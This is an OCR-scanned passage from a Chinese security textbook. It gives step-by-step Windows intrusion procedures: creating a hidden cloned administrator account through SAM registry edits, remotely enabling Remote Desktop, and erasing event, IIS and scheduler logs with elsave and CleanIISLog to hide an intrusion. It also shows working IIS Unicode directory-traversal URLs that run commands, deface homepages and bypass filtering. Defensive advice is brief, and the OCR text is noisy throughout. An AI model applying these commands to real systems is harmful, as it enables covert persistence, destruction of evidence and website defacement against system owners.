F:\hacktool > copy NN192. 168.6.73\admin $ \myadmin. reg f:\hacktool 

使 用 记事 本 打开 myadmin. reg 文件 ,查看 admin $ 账户 的 SID 值 ,其 内 容 如 下 ,其 中 可 
见 ,其 SID 值 为 0x3ee。 

Windows Registry Editor Version 5.00 

[HKEY_LOCAL MACHINE\SAM\SAM\Domains\Account\Users\Names\admin$ ] 
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@ = hex(3ee) : 
在 获得 的 远程 Shell 命令 行 ,导出 注册 表 中 “000003EE” 键 的 内 容 到 3EE. reg 文件 中 。 


C:\WINDOWS > regedit /e admin. reg HKEY_LOCAL MACHINE\SAM\SAM\Domains\Account\Users\000003EE 


在 攻击 者 的 本 地 主机 的 命令 行 ,将 3EE. reg 文件 下 载 回 本 地 主机 。 

F:\hacktool > copy \\192. 168.6.73Nadmin $ \3ee. reg f :\hacktool 

用 记事 本 同时 打开 admin. reg 和 3ee. reg 文件 ,用 admin. reg 文件 中 的 下 数据 项 的 值 
覆盖 3ee. reg 文件 中 的 下 数据 项 的 值 ,然后 保存 3ee. reg 文件 。 接 下 来 在 本 地 主机 命令 行 ， 
将 编辑 修改 后 的 3ee. reg 文件 重新 上 传 回 远程 目标 主机 。 

F:\hacktool > copy 3ee. reg \\192. 168. 6. 73\admin $ \3ee. reg 

覆盖 \\192. 168. 6.73Nadmin $ \3ee. reg 吗 ? (Yes/No/A11): y 

已 复制 三 不 文件 

(4) 在 获得 的 远程 目标 主机 的 Shell 命令 行 ,执行 以 下 命令 ,将 创建 的 admin $ 账户 删 
除 。 这 一 步 是 创建 隐藏 账户 的 关键 ,一 定 要 先 在 命令 行 删除 该 账户 ,然后 再 将 该 账户 的 信息 
导入 注册 表 。 

C:\WINDOWS > net user admin$ /del 

(5) 在 获得 的 远程 目标 主机 的 Shell 命令 行 ,执行 以 下 命令 ,将 3ee. reg 注册 表 文 件 导 
和 注册 表 。 

C:\WINDOWS > regedit /s 3ee. reg 

至 此 ,隐藏 的 克隆 账户 admin $ 就 创建 好 了 。 该 账户 在 命令 行 执行 net user 命令 或 者 
在 图 形 化 界面 的 账户 管理 器 中 都 查看 不 出 来 ,如 图 2. 22 所 示 。 


| ero zv || ë > ama [E 2 


图 2.22 查看 账户 列表 


这 样 创 建 的 隐藏 账户 ,不 能 再 更 改 密码 。 只 要 一 更 改 密码 ,在 图 形 化 的 账户 管理 器 中 ， 
就 会 显示 出 该 隐藏 账户 。 
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(6) 验证 隐藏 的 克隆 账户 的 有 效 性 和 权限 。 

在 获得 的 远程 Shell 窗口 中 按 Ctrl 十 C 键 ,结束 远 程 Shell。 然 后 在 本 地 命令 行 窗 口中 
执行 以 下 命令 , 断 开 原来 建立 的 IPC$ 连接 。 

F:\hacktool > net use NN192.168.6.73Vipc $ /del 

\\192.168.6.73\ipc$ 已 经 删除 。 

执行 以 下 命令 ,重新 使 用 admin $ 账户 与 远程 目标 主机 建立 IPC$ 连接 。 

F:\hacktool > net use NN192.168.6.73Vipc $ 24361 /user:admin $ 

命令 成 功 完成 。 

根据 输出 信息 可 见 ,连接 创建 成 功 ,说 明 admin$ 账 户 存在 。 下 面 通过 上 传 文件 来 验证 
该 账户 的 权限 大 小 , 若 能 上 传 文件 成 功 , 则 说 明 账户 克隆 也 是 成 功 的 。 

F:Nhacktool > copy sc. exe \\192. 168.6. 73\admin $ 

已 复制 1 个 文件 

根据 输出 信息 可 见 , 文 件 上 传 成 功 。 


2.5 终端 服务 


在 成 功 人 侵 获 得 远程 目标 主机 的 Shell 命令 行 并 克隆 隐藏 账户 之 后 , 若 想 能 以 图 形 化 
界面 远程 操控 目标 主机 ,最 佳 的 方法 是 开启 目标 主机 的 终端 服务 ,以 后 就 能 以 远程 桌面 连接 
的 方式 ,操控 远程 目标 主机 。 

下 面 主要 介绍 如 何 远程 开启 目标 主机 的 终端 服务 ,以 及 远程 启用 目标 主机 的 远程 桌面 
的 操作 方法 。 


2.5.1 终端 服务 简介 


利用 终端 服务 和 远程 桌面 客户 端 软件 ,可 获得 远程 目标 主机 的 桌面 环境 ,从 而 实现 以 图 
形 化 的 桌面 环境 远程 操控 目标 主机 。 

要 实现 远程 登录 并 获得 目标 主机 的 桌面 环境 ,目标 主机 应 安装 终端 服务 组 件 并 启动 
终端 服务 ,同时 还 必须 在 “控制 面板 "的 “系统 属性 ”的 “远程 "设置 选项 卡 中 , 色 选 “启用 这 
台 计 算 机 上 的 远程 桌面 ?选项 ,如 图 2. 23 所 示 ', 和 否则 客户 端 将 无 法 成 功 登 录 连 接 远程 
桌面 。 

终端 服务 默认 使 用 TCP 3389 端口 工作 ,根据 需要 ,通过 修改 注册 表 可 重 设 该 端 


口号 。 
在 结束 对 远程 桌面 的 操作 时 ,应 在 远程 桌面 系统 的 “开始 "菜单 中 选择 “注销 ”选项 ,通过 
注销 操作 系统 登录 的 方式 来 关闭 远程 桌面 的 连接 窗口 ,不 要 直接 关闭 该 窗口 ,否则 易 导 致 因 
太 多 用 户 没有 正常 退出 ,而 下 次 无 法 远程 连接 的 情况 。 


2.5.2 终端 服务 的 远程 开启 与 管理 


在 图 形 化 的 桌面 环境 来 操作 和 管理 终端 服务 比较 简单 ,下 面 针对 远程 入 侵 的 需求 介绍 
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区 EE zx 
利夫 | 计算 机 名 | 硬件 | 高 级 | 自动 更 新 远程 | 


三 运程 协助 
厂 启用 远程 协助 并 区 许 从 这 台 计算 机 发 送 扩 请 于) 
了 和解 有 关 远 程 协助 的 更 多 信息 。 


全 计算 机 的 方式 。 


图 2.23 设置 启用 远程 桌面 


以 命令 行 的 操作 方式 远程 操控 和 管理 远程 目标 主机 的 终端 服务 。 

1. 查询 和 控制 终端 服务 的 运行 

查询 终端 服务 的 运行 状态 或 远程 启动 终端 服务 的 运行 ,可 使 用 前 面 介绍 的 netsve 或 sc 
命令 来 实现 。 

2. 启用 目标 计算 机 的 远程 桌面 

要 启用 远程 目标 计算 机 的 终端 服务 ,通常 是 在 如 图 2. 23 所 示 的 图 形 化 界面 中 来 操作 完 
成 的 。 在 远程 人 侵 只 获得 远程 命令 行 的 情况 下 ,这 种 图 形 化 的 界面 操作 是 不 可 能 完成 的 ,为 
此 只 能 通过 所 获得 的 远程 命令 行 操作 来 实现 。 

色 选 “启用 这 台 计 算 机 上 的 远程 桌面 "选项 实际 上 是 修改 以 下 注册 表 项 的 
“fDenyTSConnections” 的 值 ,允许 远程 桌面 连接 ,其 值 修 改 为 0; 不 允许 , 则 值 修改 为 1. 


HKEY_LOCAL, MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server 


因此 ,在 远程 命令 行 中 .可 通过 修改 注册 表 项 的 值 来 实现 。 具 体操 作 方 法 和 步骤 是 先 通 
过 命令 行 操作 ,将 该 注册 表 项 的 数据 导出 到 文件 中 ,然后 将 文件 下 载 到 本 地 ,在 本 地 编辑 修 
改 注册 表 项 的 值 ,然后 再 将 修改 后 的 注册 表 文 件 上 传 到 远程 目标 主机 ,最 后 在 远程 命令 行 
中 ,将 注册 表 文 件 导入 注册 表 , 从 而 完成 对 目标 主机 远程 桌面 的 启用 。 

3. 查看 目标 主机 终端 服务 的 端口 号 

终端 服务 默认 使 用 的 端口 号 为 TCP 3389 ,但 用 户 是 可 以 更 改 端口 号 的 ,为 了 获知 远程 
目标 主机 终端 服务 的 端口 号 ,可 采用 以 下 操作 。 

终端 服务 的 端口 号 保存 在 注册 表 的 两 个 位 置 ,其 位 置 是 : 

HKEY_LOCAL MACHINE\SYSTEM\CurrentControlSet\Control\Terminal ServerNWdsNrdpwdNTdsNtcp 

HKEY_ LOCAL MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP - Tcp 
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在 以 上 两 个 位 置 的 表 项 下 面 都 有 一 个 名 为 PortNumber 的 数据 项 ,其 值 为 终端 服务 端 
口号 的 十 六 进 制 值 。 比 如 3389 ,其 值 为 0x00000d3d。 

要 查看 远程 目标 主机 终端 服务 的 端口 号 ,可 在 远程 命令 行 中 ,将 这 部 分 注册 表 数 据 导 出 
成 文件 ,然后 将 文件 下 载 到 本 地 ,然后 查看 PortrNumber 数据 项 的 值 即 可 。 

车 要 修改 终端 服务 的 端口 号 ,也 是 修改 注册 表 中 的 PortNumber 数据 项 的 值 ,更 改 后 要 
重启 计算 机 才能 生效 。 

4. 远程 安装 终端 服务 组 件 

如 果 目 标 主 机 未 安装 终端 服务 组 件 , 则 无 法 实现 远程 桌面 连接 。 此 时 可 利用 无 人 值守 
安装 程序 (sysocmgr. exe) 来 实现 自动 安装 该 组 件 。 通 过 使 用 “/q 参数 ”, 在 安装 过 程 中 不 需 
要 交互 ,也 不 会 显示 安装 界面 窗口 。 因 此 ,利用 sysocmgr. exe 程序 ,可 实现 在 命令 行 添加 或 
删除 Windows 组 件 。 

在 所 获得 的 远程 Shell 命令 行 , 执 行 以 下 命令 来 远程 安装 终端 服务 组 件 。 

C:\> echo [Components ]> C: Nunattend. txt 

C:\> echo TSEnable = on >> C: Nunattend. txt 

C:\> sysocmgr /i: %windir % \ inf\sysoc. inf /u:c:\unattend. txt /q /r 

参数 “/i; % windir%\inf\sysoc. inf” H FIRE E inf 的 名 称 ,以 此 作为 安装 的 源 路 径 。 
参数 “/r" 在 需要 重新 启动 系统 时 ,抑制 自动 重新 启动 系统 ,以 防止 用 户 注意 到 系统 的 异常 重 
启 。 参 数 “/u:c:\unattend. txt" 用 于 指定 无 人 值守 安装 的 应 答 文件 ,该 文件 指定 了 要 安装 或 
要 删除 的 组 件 。 

在 终端 服务 启动 成 功 并 启用 远程 桌面 后 ,以 后 就 可 使 用 远程 桌面 这 个 客户 端 软件 ,来 获 
得 目标 主机 的 远程 桌面 ,从 而 实现 对 目标 主机 基于 图 形 化 界面 的 操控 ,这 比 基 于 命令 行 的 操 
控 要 更 直观 和 方便 。 


2.6 清除 日 志 


入 侵 目 标 主 机 后 ,在 结束 本 次 入侵 攻击 之 前 ,攻击 者 一 般 都 会 清除 人 侵 日 志 记 录 和 删除 
和 人 侵 过 程 中 可 能 产生 的 临时 性 文件 ,以 消除 入 侵 痕迹 ,避免 暴露 自己 。 作 为 管理 员 ,应 经 常 
查看 和 分 析 日 志文 件 ,并 要 注意 日 志文 件 内 容 的 日 期 和 时 间 是 否 连续 , 若 发 现 某 一 个 日 
志文 件 的 内 容 缺 某 一 段 时 间 的 日 志 , 则 系统 可 能 遭受 过 入 侵 ,此 时 就 要 仔细 对 系统 进行 
检查 了 。 

日 志 记录 包括 操作 系统 产生 的 日 志 IIS 应 用 服务 进程 产生 的 日 志 记录 (比如 Web 服务 
日 志和 FTP 服务 日 志 等 ) 和 计划 任务 进程 (Scheduler) 产 生 的 日 志 。 

1. 操作 系统 日 志 

操作 系统 的 日 志 属 于 事件 日 志 , 由 操作 系统 的 Eventlog 服务 进程 自动 记录 产生 ,分 为 
应 用 程序 日 志 、 安 全 日 志和 系统 日 志 , 可 使 用 “事件 查看 器 ”查看 。 

操作 系统 日 志文 件 默认 保存 在 %windir%\system32\config\ 目 录 下 ,但 用 户 可 以 进行 
设置 修改 。 不 过 ,可 以 通过 查看 目标 主机 的 注册 表 项 ,来 获知 操作 系统 日 志文 件 的 存放 位 
置 。 记 录 操 作 系统 日 志文 件 位 置 的 注册 表 项 为 HKEY_LOCAL_MACHINENSYSTEMN 
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CurrentControlSet\Services\Eventlog\ ,在 Eventlog 子 项 下 面 又 有 Application Security 和 
System 3 个 子 项 ,分 别 记 录 的 是 应 用 程序 日 志 、 安 全 日 志和 系统 日 志 的 相关 配置 信息 ,如 
图 2.24 所 示 。 
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图 2.24 操作 系统 日 志 配 置信 息 在 注册 表 中 的 位 置 


若 遇 到 对 方 管理 员 更 改 了 操作 系统 日 志 的 存放 位 置 ,目前 又 只 获得 远程 Shell 的 情况 
下 , 则 可 通过 导出 目标 主机 的 注册 表 项 来 查看 获知 。 

在 操作 系统 日 志 中 ,与 人 侵 记 录 相 关 的 主要 是 安全 性 日 志 , 在 该 日 志 中 记录 了 账户 登录 
成 功 与 失败 ,登录 与 注销 、 策 略 改动 等 事件 信息 。 

如 果 管 理 员 没有 在 “本 地 安全 设置 ">“ 本 地 策略 ”一 “审核 策略 ”中 开启 对 相关 事件 的 审 
核 , 则 操作 系统 不 会 记录 这 些 事件 日 志 。 

要 清除 操作 系统 日 志 , 可 使 用 elsave. exe 工具 软件 来 实现 ,该 工具 软件 可 清除 远程 主机 
或 本 地 主机 的 操作 系统 日 志 。 若 用 于 清除 远程 主机 的 操作 系统 日 志 ,在 执行 该 命令 之 前 ,应 
先 创建 IPC$ 连接 ,并 具备 管理 员 权限 。 

命令 用 法 : elsave -s \\remote_ip -1 "application| system| security" [ -F logfilepath] -C 

参数 说 明 :“-s \\remote_ip” 用 于 指定 要 清除 操作 系统 日 志 的 远程 目标 主机 的 IP 地 址 。 
“1 参数 用 于 指定 日 志 的 类 型 ,其 中 ,application 代表 应 用 程序 日 志 ,system 代表 系统 日 志 ， 
security 代表 安全 日 志 。*“-C” 代 表 清 除 日 志 。"-F log filepath "参数 为 可 选项 ,用 于 指定 日 
志文 件 的 路 径 。 

例如 ,车 要 清除 IP 地 址 为 192. 168. 168. 231 目标 主机 的 安全 日 志 , 则 操作 命令 为 : 


elsave - s \\192. 168. 168.231 -1 "security" -C 


2. IIS 日 志 
对 于 通过 SQL 注 和 人 攻击 进行 人 侵 ,通过 网 站 后 台 系 统 入 侵 或 者 FTP 登录 进行 人 侵 等 
操作 ,会 在 IIS 日 志 中 留 下 访问 日 志 记录 。 
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HS 日 志 默 认 保 存在 % windir%\system32\logfiles\ 目 录 中 。 对 于 www 日 志保 存在 
W3SVC1 子 目录 中 ,FTP 日 志保 存在 MSFTPSVC 子 目 录 中 。 默 认 每 天 产生 一 个 日 志 
RIF, 

要 清除 IIS 日 志 ,可 使 用 CleanllSLog. exe 工具 软件 来 实现 ,该 软件 只 能 在 远程 目标 主 
机 本 地 运行 ,不 能 在 客户 端 远程 执行 ,而 且 必 须 具 有 Administrator 权限 。 不 过 ,可 在 所 获得 
的 远程 Shell 的 命令 行 中 来 执行 。 

CleanlISLog. exe 可 以 不 留 痕 迹地 清除 指定 IP 的 HS 访问 连接 记录 ,并 能 在 系统 日 志 
中 将 本 身 的 运行 记录 清除 ,其 命令 用 法 为 ; 


CleanIISLog < LogFile| .> < CleanIP|.> 


参数 说 明 : LogFile 代表 要 处 理 的 日 志文 件 , 车 指定 为 “.”, 则 表示 在 所 有 的 日 志文 件 
中 进行 日 志清 除 操作 ; CleanIP 用 于 指定 要 清除 哪个 IP 的 访问 连接 日 志 , 若 指定 为 “.”, 则 
清除 所 有 的 IP 日 志 记录 , 即 清除 日 志文 件 中 的 全 部 内 容 。 

例如 ,车 要 在 远程 目标 主机 中 清除 与 192. 168. 168. 15 相关 的 IIS 日 志 记录 , 则 操作 步 
又 如 下 。 

首先 将 CleanIISLog. exe 文件 上 传 到 远程 目标 主机 ,然后 在 所 获得 的 远程 Shell 命令 行 
执行 以 下 命令 。 

C:\> cleaniislog . 192.168.168.15 

CleanIISLog Ver 0.1, by Assassin 2001. All Rights Reserved. 


Stopping Service w3svc. 
Service w3svc Stopped. 
Stopping Service msftpsvc. 
Service nsftpsvc Stopped. 


Process Log File ex091015. log...Done (0010) Records Removed 
Process Log File ex091019. log...Done (0012) Records Removed 


Starting up w3svc... 
Service w3svc Started. 
Starting up msftpsvc. 
Service msftpsvc Started. 
Restore Service 


3. 计划 任务 进程 产生 的 日 志 

计划 任务 服务 进程 产生 的 日 志文 件 默认 保存 在 %windir%\Tasks\SchedLgu. txt 文件 
中 。 要 删除 该 日 志文 件 或 清除 日 志文 件 的 内 容 , 必 须 先 停止 Task Scheduler 服务 ,删除 之 
后 ,再 开启 该 服务 。 

计划 任务 的 日 志文 件 配 置信 息 , 保 存在 以 下 注册 表 项 中 ,如 图 2. 25 所 示 。 其 中 的 
LogPath 数据 项 的 值 就 是 日 志文 件 的 路 径 及 其 日 志文 件 的 名 称 。 


HKEY LOCAL MACHINE\SOFTWARE\Microsoft\Schedul ingAgent 
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图 2.25 计划 任务 日 志文 件 配置 信息 在 注册 表 中 的 位 置 


27 网 络 安 全 漏洞 与 网 络 安全 


本 节 主 要 介绍 网 络 漏洞 对 网 络 安全 的 威胁 ,并 以 Unicode 漏洞 .SQL 注入 漏洞 为 例 , 介 
绍 利用 网 络 漏洞 进行 系统 攻击 与 人 侵 的 基本 方法 。 
2.7.1 安全 漏洞 简介 

1. 安全 漏洞 的 定义 

安全 漏洞 , 简 言 之 即 为 与 系统 安全 性 相关 的 漏洞 。 微 软 公司 的 定义 是 : 在 合理 配置 了 
产品 的 条 件 下 ,由 于 产品 自身 存在 的 缺陷 ,产品 的 运行 可 能 被 改变 以 产生 非 设计 者 预期 的 后 
果 , 并 可 最 终 导致 安全 性 被 破坏 的 问题 ,包括 使 用 者 系统 被 非法 侵占 ,数据 被 非法 访问 并 洪 
露 ,或 系统 拒绝 服务 等 ,这 些 缺 陷 称 为 安全 漏洞 。 

比如 缓冲 区 溢出 漏洞 .这 是 一 个 在 操作 系统 、 各 种 应 用 服务 软件 中 普遍 存在 的 一 种 漏 
洞 。 当 目标 主机 收 到 超过 它 处 理 能 力 的 数据 时 ,将 发 生 缓冲 区 溢出 。 这 些 多 余 的 数据 使 程 
序 的 缓冲 区 溢出 ,然后 覆盖 程序 数据 。 溢 出 使 目标 系统 的 程序 被 修改 ,经 过 这 种 修改 ,大 部 
分 结果 将 在 目标 系统 上 产生 一 个 后 门 或 获得 目标 系统 的 “System” 执 行 权 限 。 通 过 精心 构 
造 发 送 数据 ,攻击 者 还 可 改变 程序 执行 流程 ,执行 任意 代码 。 

2. 安全 漏洞 的 类 别 

在 网 络 平台 中 ,网 络 安全 漏洞 是 大 量 而 且 普 遍 存在 的 ,包括 网 络 通信 协议 (比如 DNS, 
TCP SSL 等 ) 存 在 的 安全 漏洞 .应 用 服务 器 软件 存在 的 安全 漏洞 (比如 HS 或 Apache 服务 
器 存在 的 安全 漏洞 ) .客户 端 主机 应 用 程序 (比如 Flash 播放 器 IE 浏览 器 .Adobe Reader 阅 
读 器 等 ) 存 在 的 安全 漏洞 .服务 器 和 客户 端 操作 系统 存在 的 安全 漏洞 等 。 

3. 安全 漏洞 对 网 络 安全 的 威胁 

安全 漏洞 对 网 络 系统 的 安全 构成 了 严重 的 威胁 。 不 同 的 漏洞 ,其 利用 方法 各 不 相同 ,但 
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最 终 的 目的 是 要 获得 对 目标 系统 的 最 高 控制 权 。 

成 功利 用 网 络 安全 漏洞 ,攻击 者 可 获得 远程 执行 权限 或 提升 账户 权限 ,获得 管理 员 账 户 
或 系统 账户 的 执行 权限 ,从 而 实现 远程 执行 任意 指令 ,并 进一步 控制 目标 计算 机 系统 。 根 据 
漏洞 的 性 质 和 严重 程度 ,攻击 者 甚至 还 可 利用 网 络 漏洞 发 起 大 面积 的 网 络 攻击 。 

比如 DNS 协议 的 Kaminsky 漏洞 ,将 导致 域名 解析 被 劫持 ,使 用 户 在 不 知情 的 情况 下 
访问 错误 的 网 站 ,并 容易 引发 网 络 钓鱼 攻击 ,对 网 站 构成 严重 的 安全 威胁 。 操 作 系统 和 应 用 
服务 软件 所 存在 的 安全 漏洞 ,使 攻击 者 可 获得 远程 执行 任意 代码 的 权限 ,导致 主机 被 攻击 者 
所 控制 。 

目前 ,对 网 络 的 入 侵 和 攻击 ,基本 上 都 是 利用 系统 所 存在 的 安全 漏洞 进行 的 ,利用 IPC $ 
远程 连接 的 人 侵 较 少 , 因 目 前 操作 系统 大 多 数 都 内 置 或 安装 了 防火 墙 ,创建 IPC$ 连接 的 成 
功 几 率 较 小 。 

“ 挂 马 ? 也 是 目前 常用 的 一 种 攻击 人 侵 方式 , 它 是 在 网 页 中 肉 入 恶意 代码 , 当 存 在 某 方面 
安全 漏洞 的 用 户 访问 这 些 网 页 时 ,嵌入 网 页 的 木马 就 会 利用 安全 漏洞 侵入 用 户 系统 , 资 取 用 
户 敏感 信息 或 进行 攻击 破坏 。 


2.7.2 Unicode 漏洞 攻击 及 防范 


1. Unicode 漏洞 简介 

Unicode 漏洞 是 一 个 比较 经 典 的 漏洞 ,该 漏洞 的 存在 使 利用 TIS 构建 的 网 站 无 任何 安全 
性 可 言 。 该 漏洞 是 HIS 4.0 A S 5. 0 在 对 Unicode 字符 解码 的 实现 过 程 中 存在 严重 的 缺 
陷 , 导 致 任意 用 户 通过 IIS 可 以 远程 执行 任意 命令 。 

该 漏洞 从 中 文 版 IIS 4. 0 十 SP6 开始 存在 , 受 影响 的 系统 还 包括 Windows 2000 Server 十 IS 
5.0.Windows 2000 Server 十 IIS 5. 0 十 SP1 。 

该 漏洞 在 目前 主流 的 服务 器 操作 系统 中 已 不 再 存在 ,对 现 有 的 服务 器 应 用 系统 不 会 再 
构成 威胁 。 此 处 选用 该 漏洞 ,主要 是 向 读者 展示 网 络 安全 漏洞 对 系统 安全 所 带 来 的 安全 威 
胁 是 多 么 的 严重 。 

存在 该 漏洞 的 IIS 在 打开 URL 地 址 时 ,如 果 URL 路 径 中 存在 Unicode 字符 , 它 会 对 其 
进行 解码 。 若 用 户 构造 一 些 特殊 的 编码 ,可 实现 绕 过 IIS 的 路 径 检查 ,导致 IIS 错误 地 打开 
或 者 执行 Web 站 点 根 目录 以 外 的 文件 或 程序 ,从 而 带 来 安全 问题 。 

对 于 中 文 版 的 IIS 4. 0/5.0, 若 URL 路 径 或 网 页 文件 名 中 包含 类 似 “%cl1%hh” 或 
“%c0%hh” 的 特殊 字符 , 它 会 首先 将 其 解码 变 为 “0xc10xhh "或 “0xc00xhh”, 然 后 尝试 打开 
该 文件 。 

Windows 系统 会 认为 “0xc10xhh" 是 Unicode 编码 .因此 它 会 首先 对 其 进行 解码 ,然后 
再 打开 该 文件 。 在 进行 解码 时 .如 果 0x00 二 = 二 0xhh 二 0x40, 则 采用 的 解码 公式 为 : 


% cl % hh— (0xc1 — 0xc0) * 0x40 + 0xhh 
% c0 % hh— (0xc0 — 0xc0) * 0x40 + 0xhh 


利用 这 种 解码 方案 ,可 以 构造 出 一 些 特殊 字符 ,以 实现 绕 过 IIS 的 路 径 检查 ,从 而 实现 
执行 或 者 打开 任意 的 文件 。 

例如 ,利用 以 下 编码 ,可 构造 出 路 径 表 达 所 需要 的 “/” 和 “\” 字 符 。 
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% cl%1lc>(0xcl— 0xc0) x 0x40 + Oxlc = 0x5c = "/" 

% c0 % 2£— (0xc0 — 0xc0) * 0x40 + 0x2f = "X" 

因此 ,对 于 中 文 版 的 HS 4.0/5.0, 就 可 以 用 “%cl1%1c" 来 替代 表示 URL 路 径 中 的 “/” 
字符 。 对 于 要 执行 的 命令 中 的 空格 ,可 使 用 “十 "字符 来 表示 。 对 于 Windows 2000 Server 
英文 版 ,“/” 字 符 采 用 “%c0%af” 来 表示 。 

2. Unicode 漏洞 的 攻击 方法 

假设 192. 168. 168. 254 主机 为 中 文 版 Windows 2000 Server 十 IIS 5.0 系统 。Windows 
系统 安装 在 Windows 目录 中 。 若 安装 目录 是 winnt, 则 将 URL 路 径 中 的 Windows 换 成 
winnt 即 可 。 下 面 以 该 主机 为 例 , 介 绍 Unicode 漏洞 的 利用 与 攻击 方法 。 

(1) 检查 Unicode 漏洞 是 否 存在 

在 I 下 浏览 器 中 输入 以 下 地 址 : 


http://192.168. 168. 254/scripts/.. % c1 % 1c../windows/system32/cmd. exe?/c + dir 
该 URL 路 径 经 过 解码 后 就 等 价 于 : 
http://192.168. 168. 254/scripts/../../windows/system32/cmd. exe?/c + dir 


输入 以 上 URL 路 径 并 按 Enter 键 , 若 显示 如 图 2. 26 所 示 的 内 容 , 则 说 明 该 系统 存在 
Unicode 漏洞 。 


XEO RBO FEV KEW IAD WBW 
Om- O- 3 23) Q| O me wr O| ¿ w]. L Ë 


地 址 (D) a http: /|192.168.168.254/scripts|..%c1%1c..j|wndows[system32|cmd.exe?|c+dr 


Directory of c:\inetpub\scripts 


2008-12-01 09:53 DIR 
2008-12-01 09:53 <DIR> .. 
0 File(s) 0 bytes 
2 Dir(s) 7,082,577,920 bytes free 


图 2. 26 检查 是 否 存在 Unicode 漏洞 


URL 路 径 中 的 “../../” 相 当 于 在 当前 路 径 的 基础 上 ,连续 二 次 返回 上 级 目录 ,这 样 就 回 
到 了 C: 盘 的 根 目 录 (C:\), 接 下 来 就 可 通过 指定 的 路 径 *windows/system32/cmd. exe”, 访 
问 到 Shell 程序 cmd. exe。 

“http://192. 168. 168. 254/scripts/..% cl % 1c../windows/system32/cmd. exe? /c+” 
之 后 的 部 分 就 是 要 执行 的 DOS 命令 。 在 DOS 命令 中 ,空格 用 “十 "替代 表示 。 

例如 , 若 要 显示 C:\ 下 的 目录 文件 列表 , 则 可 输入 以 下 URL 地 址 : 


http://192.168. 168. 254/scripts/.. % c1 % 1c../windows/system32/cmd. exe?/c + dir + c:\ 
执行 后 输出 的 结果 如 图 2. 27 所 示 。 


TE IS 创建 的 默认 网 站 中 ,默认 创建 了 名 为 Scripts 的 虚拟 目录 ,如 图 2. 28 所 示 。 若 管 
理 员 删 除了 该 虚拟 目录 , 则 以 上 方法 失效 。 
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Jisan ns => 


EC 
QAE- O - dA | De aR e| a wj - U Ë 


Directory of c:\ 


2001-02-13 17:09 131,072 CleanIISLog. exe 
2008-12-01 10:01 Documents and Settings 
2008-12-01 09:53 Inetpub 
2009-10-19 15:54 28 inst 
2007-02-07 14:15 81,920 nc. exe 
2002-08-31 06:02 126,976 NTLM. EXE 
2008-12-01 09:54 Program Files 
2009-10-19 16:20 WINDOWS 

4 File(s) 339, 996 bytes 

4 Dir(s) 7,082,577, 920 bytes free 


图 2.28 TIS 默认 站 点 所 创建 的 虚拟 目录 


(2) 利用 Unicode 漏洞 的 攻击 示例 
@ 创建 目录 。 
例如 , 若 要 创建 C:\mysite 目录 . 则 实现 的 操作 为 : 


http://192.168. 168. 254/scripts/.. %c1 % 1c../windows/system32/cmd. exe?/c + md + c: Vnysite 

© 在 创建 的 目录 中 添加 或 修改 文件 。 

例如 ,车 要 在 创建 的 目录 中 添加 一 个 index. htm 文件 ,文件 内 容 为 “Hacked by 
Sniper”, 则 实现 的 操作 为 : 

http://192.168. 168. 254/scripts/.. % c1 % 1c../windows/system32/cmd. exe?/c + echo + Hacker + by 
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+ Sniper + > + c: \mysite\ index. htm 


在 IE 浏览 器 中 输入 以 上 地 址 并 按 Enter 键 后 ,将 显示 输出 “The parameter is 
incorrect. ”的 提示 信息 ,执行 未 成 功 。 这 是 因为 IS 加 载 程序 在 检测 到 有 cmd. exe 或 者 
command. com 字符 串 时 ,要 进一步 检查 “&|(,;% 二 二 "特殊 字符 ,车 发 现 有 这 些 特殊 字符 ， 
就 不 允许 执行 。 此 时 ,可 采取 在 cmd. exe 程序 的 主 名 后 面 跟 上 一 个 双 引号 ,来 绕 过 US 加 载 
程序 的 检查 。 此 时 的 执行 方法 如 下 所 示 : 


http://192. 168. 168. 254/scripts/.. % cl % 1c../windows/system32/cmd". exe?/c + echo + Hacker + 
by+ Sniper + > + c:\mysite\ index. htm 


此 时 执行 后 ,在 IE 浏览 器 中 输出 的 信息 为 : 


CGI Error 

The specified CGI application misbehaved by not returning a complete set of HTTP headers. The 

headers it did return are: 

当 看 到 该 信息 , 则 说 明 命 令 执 行 成 功 。 将 二” 重 定向 符 更 换 为 二 二 ” 重 定向 符 , 可 实现 
以 追加 方式 添加 内 容 。 利 用 该 方法 ,可 以 黑 掉 任何 具有 该 漏洞 的 网 站 。 有 时 网 站 首页 文件 
无 法 使 用 echo 写 和 人 ,除了 权限 问题 之 外 ,也 可 能 是 文件 被 设置 为 只 读 ,此 时 可 使 用 attrib 来 
修改 文件 的 属性 。 

在 利用 该 方法 来 黑 掉 网 站 首页 文件 时 ,应 首先 获得 网 站 的 磁盘 物理 路 径 。 对 于 存在 
Unicode 漏洞 的 系统 ,通常 也 存在 ida 漏洞 。 利 用 ida 漏洞 可 获得 网 站 的 物理 路 径 。 

在 I 浏览 器 中 输入 以 下 地 址 , 即 可 获得 网 站 根 目 录 的 位 置 ,如 图 2. 29 所 示 。 


http://192.168. 168. 254/. idq 


F http://192.168.168.254/.jdq - Microsoft Internet Explorer Ë 
XD RKO EEV RAA IAD HIW Li 
UTEPEERERPIEP ETID OA 
地址 (@) fÆ http://192.168.168.254/.idq 


找 不 到 IDQ 文件 c:\inetpub\wwroot\. idq。 


图 2.29 利用 idq 漏 洞 获 得 网 站 根 目录 路 径 


@ 删除 文件 。 
例如 ,车 要 删除 刚才 创建 的 index. htm 文件 , 则 实现 操作 为 : 


http://192.168. 168. 254/scripts/..% cl % 1c../windows/system32/cmd. exe?/c + del + c: \mysite\ 
index. htm 


@ 删除 目录 。 
假设 删除 刚才 创建 的 C:\mysite 目录 , 则 实现 的 操作 为 : 


http://192. 168. 168. 254/scripts/.. % c1 % 1c../windows/system32/cmd. exe?/c + rd + c:\mysite 
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@ 查看 指定 文件 的 内 容 。 

假设 有 C:\test. htm 文件 ,现在 查看 该 文件 的 内 容 , 则 执行 方法 为 : 

http://192. 168. 168. 254/scripts/..% cl% lc../windows/system32/cmd. exe?/c + type + c: \ 

test.htm 

除了 可 执行 以 上 DOS 命令 外 ,理论 上 利用 该 方法 可 执行 任意 命令 。 从 中 可 见 , 安 全 漏 
洞 对 系统 安全 的 威胁 是 直接 的 .严重 的 。 对 该 漏洞 的 防范 通过 对 系统 打 补丁 来 解决 。 


2.7.3 SQL 注入 漏洞 攻击 及 防范 


1. SQL 注入 漏洞 简介 

SQL 注入 (SQL Injection) 技 术 最 早出 现在 1999 年 ,目前 没有 对 SQL 注入 技术 的 标准 
定义 ,微软 中 国 技术 中 心 从 以 下 两 方面 对 其 进行 了 描述 。 

